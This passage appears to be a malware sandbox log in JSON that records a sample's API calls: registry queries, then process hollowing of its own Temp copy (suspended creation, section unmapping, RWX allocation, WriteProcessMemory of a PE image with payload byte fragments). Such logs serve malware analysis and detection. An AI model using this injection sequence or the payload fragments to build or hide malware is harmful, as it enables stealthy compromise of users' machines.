"HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource" } ], "repeated": 0, "id": 1229 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType" } ], "repeated": 0, "id": 1230 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly" } ], "repeated": 0, "id": 1231 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable" } ], "repeated": 0, "id": 1232 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate" } ], "repeated": 0, "id": 1233 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream" } ], "repeated": 0, "id": 1234 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath" } ], "repeated": 0, "id": 1235 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags" } ], "repeated": 0, "id": 1236 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes" } ], "repeated": 0, "id": 1237 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID" } ], "repeated": 0, "id": 1238 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002d0" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler" } ], "repeated": 0, "id": 1239 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002d4" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x000002d0" }, { "name": "ObjectAttributesName", "value": "PropertyBag" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag" } ], "repeated": 0, "id": 1240 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d0" } ], "repeated": 0, "id": 1241 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002d8" } ], "repeated": 0, "id": 1242 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows" } ], "repeated": 0, "id": 1243 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407f42", "parentcaller": "0x00409c49", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1244 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00408185", "parentcaller": "0x00409c49", "category": "process", "api": "NtCreateUserProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "ProcessDesiredAccess", "value": "0x02000000" }, { "name": "ThreadDesiredAccess", "value": "0x02000000" }, { "name": "ProcessFileName", "value": "" }, { "name": "ThreadName", "value": "" }, { "name": "ImagePathName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CommandLine", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "ProcessId", "value": "7456" } ], "repeated": 0, "id": 1245 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408185", "parentcaller": "0x00409c49", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "4148" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e3c" } ], "repeated": 0, "id": 1246 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408185", "parentcaller": "0x00409c49", "category": "process", "api": "CreateProcessW", "status": true, "return": "0x00000001", "arguments": [ { "name": "ApplicationName", "value": "" }, { "name": "CommandLine", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe" }, { "name": "CreationFlags", "value": "0x00000004" }, { "name": "ProcessId", "value": "7456" }, { "name": "ThreadId", "value": "7632" }, { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1247 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x004081a8", "parentcaller": "0x00409c49", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x000002d8" }, { "name": "HollowedInstructionPointer", "value": "0x0040b10f" }, { "name": "CurrentInstructionPointer", "value": "0x771c57c0" }, { "name": "ProcessId", "value": "7456" } ], "repeated": 0, "id": 1248 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x004081c4", "parentcaller": "0x00409c49", "category": "process", "api": "NtReadVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x0040b10f" }, { "name": "Size", "value": "0x00000004" }, { "name": "Buffer", "value": "U\\x8b\\xecj" } ], "repeated": 0, "id": 1249 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x004081d5", "parentcaller": "0x00409c49", "category": "process", "api": "NtUnmapViewOfSection", "status": false, "return": "0xffffffffc0000019", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x6aec8b55" }, { "name": "RegionSize", "value": "0x0c288000" } ], "repeated": 2, "id": 1250 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408205", "parentcaller": "0x00409c49", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1251 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408213", "parentcaller": "0x00409c49", "category": "process", "api": "NtUnmapViewOfSection", "status": false, "return": "0xffffffffc0000019", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "RegionSize", "value": "0x10000000" } ], "repeated": 0, "id": 1252 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x004082c1", "parentcaller": "0x00409c49", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "RegionSize", "value": "0x06bd0000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1253 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x004082f0", "parentcaller": "0x00409c49", "category": "process", "api": "NtAllocateVirtualMemory", "status": false, "return": "0xffffffffc0000018", "pretty_return": "CONFLICTING_ADDRESSES", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00300000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1254 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408308", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": false, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00000000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1255 }, { "timestamp": "2025-03-02 21:32:30,019", "thread_id": "4148", "caller": "0x00408319", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "Buffer", "value": "MZP\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x0f\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00PE\\x00\\x00L\\x01\\x0b\\x00\\x19^B*\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\x00\\x8e\\x81\\x0b\\x01\\x02\\x19\\x00\\xe4\\x08\\x00\\x00\\x08\\x05\\x00\\x00\\x00\\x00\\x00\\x01p\\x0e\\x00\\x00\\x10\\x00\\x00\\x00\\x00\t\\x00\\x00\\x00@\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x11\\x00\\x00\\x04\\x00\\x00\\xeb\\xa3\\x13\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00@\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x80\\x0e\\x00(\\x00\\x00\\x00\\x00P\n\\x00\\x04\\x1d\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x7f\\x0e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "BufferLength", "value": "0x00000400" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1256 }, { "timestamp": "2025-03-02 21:32:30,034", "thread_id": "4148", "caller": "0x00408319", "parentcaller": "0x00409c49", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1257 }, { "timestamp": "2025-03-02 21:32:30,065", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00401000" }, { "name": "Buffer", "value": " K\\xbb\\xb2\\x99\\x11\\xaa\\x004\\xc7\\x9c\\xe7<\\x92rC\\x81\\xce@\\x91!\\x08\\x93\\x8aE\\x08\\xa7\\xa4\\x84\\x04!\\x08\\x9c$\\x84!\\xef!\t\\x02C\\xd5\\x14#\\x10\\x10,\\x9erB\\xa8\\x84\\xe5\\xf2D\\x9e\\x1f\\xaf++\\xeb]\\xea\\xf6\\xd4\\xa2\\xde\\xb5\\xafm\\x8f\\xb1\\x01j\\xf2N\\x04\\x84\\x05\\x18\\x03R\\x04=\\xc1\\x19\\x0f\\x14\"\\x8b\\x08\\x04Ny\\xc9\\x08\\xc1\\xdd\\xeb\\xda\\xb9\\xdc\\xdc\\xcbw73N\\xef\\xfd\\x07w3r\\x03\\xdd\\xdc\\x81\\xdbwy\\x07\\xbb\\xb6\\x05j\\xf2\\x03k\\x14k`\n\\x91\\x02\\xe3\\x90\\x1b\\x8eAonp\\x17\\xaeC\\xad\\xaeA\\xed\\xb7 ^\\xeb\\x90;\\xd5\\xc0v\\xe6\\xe4\\x86\\xdb\\xdc\\x81n\\xdc\\x91\\xee\\xee`\\xbb\\xdbpm\\xee\\xeegw\\xfb\\xff\\xf5\\xfd\\xff|\\xf9\\xf7\\xef\\xdf>\\xfe\\xfd\\xf7\\xf7\\xef3\\xces\\xff\\xfe{\\xfc\\x0c\\xc1\\xa0\\x8a&/Z\\xadV\\x8b-\\x8e\\xd2H/\\x9f\\xfe\\xce\\x80%0\\xd8\\xed\r\\xb6P\\xebm\\x86\\xec\\xa7Q\n$\\&\\x1a\\xfb]\\x8d\\xb3FH3GCQx\\x91V^-\\x1dZ" }, { "name": "BufferLength", "value": "0x00039c00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1258 }, { "timestamp": "2025-03-02 21:32:30,097", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x0048f000" }, { "name": "Buffer", "value": "\\x14;\\xbb\\xb2\\x91\\x90\\x00\\x00B\\xbf\\x9b\\x9b&ud\\\\xcaX2CV\\xc4\\xcc\\xa5\\xc3.\\x04\\xa7F\\xb2\\xe6]\\xb2n6\\xe3\\xa5\\xd2\\xe3;s\\x9c\\xb8\\xb3l\\xdc\\xe7\\x12k0\\xff\\x9ca[\\x8bLl\\x13C\\x19\\xe1\\xccC\\x03BS\\x07\\x8b\\xae\\x84\\x16\\xd6J\\x816Jch\\xdc-\\xa8\\xfb\\xa5u\\x96vx\\xa76\\xe7\\x9f>\\xf9\\xb8x\\x1a#7^\\xba\\xab\\xb5\\xebwF\\x05J\\x0ey\\xaa4\\xe2\\xb0\\xa3\\xd1<\\xe9\\x85\\x184n\\xb5\\xc3cDA\\xc4\\xbf\\xc1+\\xa5\\xa2#]iA\\x8b\\xa2\\xfd\\xff\\xf7\\xff\\xc0\\xef_\\xde\\xc3\\xefG\\xdf\\xc0\\xfe\\x87\\xdf\\x9e\\xfd{\\xf9\\xf3\\xd7\\xc4\\xees\\xb9g\\xc21M)\\xe4H\\xe0\\x8b\\xc6\\xea\\xabWk\\x99\\x99\\xc8a\\xa7<\\xc6f\\xc3\\xb6K\\xab^`\\x8b3\"\\x0f!\\xf2\\xf6l\\xe9d\\x04D\\x11B\\xa9\\xce\\xdd,\\x85\\x02fa6>\\xd9b\\xd8\\xd8\\xd1[\\xb0\\xf0Nz>\\xe3vUx\\x9d\\x07dt\\x96\\xe1S\\xbd\\xc3\\x05\\xb7\\xb5\\x1d\\x87\\xd2\\xf7\\x00NX<\\xfd\\xf9\\xd0\\xa1\\x95" }, { "name": "BufferLength", "value": "0x00000600" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1259 }, { "timestamp": "2025-03-02 21:32:30,112", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00490000" }, { "name": "Buffer", "value": "$C\\xbb\\xb2\\x19\\x11\\xa0\\x00\\x15Y(/\\xa041\\x914\\xfe\\xda<&\\xb9\\x9es\\xcb\\x87\\xcc\\x82\\x1cR\\x03 \\xf5\\x8aDd\\x13b\\x91\\x99\\x058\\xa7c!\\x15\\x8aHd$\\xb1O\\x86@\\xf5B" }, { "name": "BufferLength", "value": "0x00001200" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1260 }, { "timestamp": "2025-03-02 21:32:30,128", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00493000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1261 }, { "timestamp": "2025-03-02 21:32:30,144", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x00497000" }, { "name": "Buffer", "value": "\\x10;3\\xaa!\\x19\\x80\\x00:\\xba\"A\\xa8\\x94K\\xd1JR\\x90\\x85!\\x04\\x82$\\x1b\nB\\x08\\x93?\\x1b\\xf9\\x93u\\xdc\\x8e\\xe4\\xc6\\x88\\x96<\\xdc\\xe73s\\x8e\\xf39\\xcc\\x9c\\xe73]\\xd6\\xb6V\\xb6Y[+Z\\xd9ef\\xc4HN\\x84H\"$)\\x04J\"R\\x08\\x90\\xa4 \\x88\\x90J$\\x12\\x08\\x90\\x82$!DD\\x843\\xce\\x8ad\\xe4\\x91vil\\x9bG\\xa2\\xce\\xd6u\\xad\\x08\\x1a\\xc9\\xaa.\\xb9\\x9c\\xcdZ\\xc9\\x98\\xc2\\xc5\\xdd,e\\xc6-v5\\x82\\x9a\\xcc\\x8aGma\\x93WCd\\xd6\\xc1u\\x9a\\x8c\\xdd\\xb11\\xd6f\\x9bZ\\xc4uX\\x8cla#,\\xc0\\xbd/\\xff\\xff\\xf5\\xd3\\xcf\\xcf<\\xf7\\xdc\\xfa\\x19\\x9d8`a\\xf7\\xcf~{\\xf3\\xdf=[\\xd0|\\xaa\\xc7\\xee\\xb7t2\\xf7kl\\xc9\\x89N\\x8c\\x08\\xc7\\x04[\\x1a\\xd7\\xd8k[\\x91krlm\\x03\\x92\\x15\\xf3\\xdb\\x0cG\\xd9k\\x7f\\x166\\xc6\\xc1pk\\x83\\x18\\x94[\\x0f\\xa1\\xf7\\xda\\xc8\\xfdf\\xb8\\xb6\\xc7\\x98\\x16\\xf1\\xf3\\xa4\\x1b\n\\xffJ\\xd6\\xf7" }, { "name": "BufferLength", "value": "0x00000e00" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1262 }, { "timestamp": "2025-03-02 21:32:30,159", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x0049a000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1263 }, { "timestamp": "2025-03-02 21:32:30,190", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x0049b000" }, { "name": "Buffer", "value": "\\x00\\xa0I\\x00@\\xa0I\\x00\\xac\\x07I\\x00\\x10\\xb0I\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "BufferLength", "value": "0x00000200" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1264 }, { "timestamp": "2025-03-02 21:32:30,253", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x0049c000" }, { "name": "Buffer", "value": "" }, { "name": "BufferLength", "value": "0x00000000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1265 }, { "timestamp": "2025-03-02 21:32:30,269", "thread_id": "4148", "caller": "0x00408359", "parentcaller": "0x00409c49", "category": "process", "api": "WriteProcessMemory", "status": true, "return": "0x00000001", "arguments": [ { "name": "ProcessHandle", "value": "0x000002d0" }, { "name": "BaseAddress", "value": "0x004a5000" }, { "name": "Buffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\t\\x00\\x01\\x00\\x00\\x00X\\x00\\x00\\x80\\x02\\x00\\x00\\x00\\xa0\\x00\\x00\\x80\\x03\\x00\\x00\\x00\\x08\\x01\\x00\\x80\\x05\\x00\\x00\\x00p\\x01\\x00\\x80\\x06\\x00\\x00\\x00\\x90\\x01\\x00\\x80\n\\x00\\x00\\x00 \\x02\\x00\\x80\\x0c\\x00\\x00\\x00P\\x02\\x00\\x80\\x0e\\x00\\x00\\x00\\x98\\x02\\x00\\x80\\x10\\x00\\x00\\x00\\xb0\\x02\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x07\\x00\\x01\\x00\\x00\\x00\\xc8\\x02\\x00\\x80\\x02\\x00\\x00\\x00\\xe0\\x02\\x00\\x80\\x03\\x00\\x00\\x00\\xf8\\x02\\x00\\x80\\x04\\x00\\x00\\x00\\x10\\x03\\x00\\x80\\x05\\x00\\x00\\x00(\\x03\\x00\\x80\\x06\\x00\\x00\\x00@\\x03\\x00\\x80\\x07\\x00\\x00\\x00X\\x03\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x0b\\x00\\x00\\x00@\\x0c\\x00\\x80p\\x03\\x00\\x80P\\x0c\\x00\\x80\\x88\\x03\\x00\\x80\\\\x0c\\x00\\x80\\xa0\\x03\\x00\\x80n\\x0c\\x00\\x80\\xb8\\x03\\x00\\x80~\\x0c\\x00\\x80\\xd0\\x03\\x00\\x80\\x8c\\x0c\\x00\\x80\\xe8\\x03\\x00\\x80\\x9e\\x0c\\x00\\x80\\x00\\x04\\x00\\x80\\xa8\\x0c\\x00\\x80\\x18\\x04\\x00\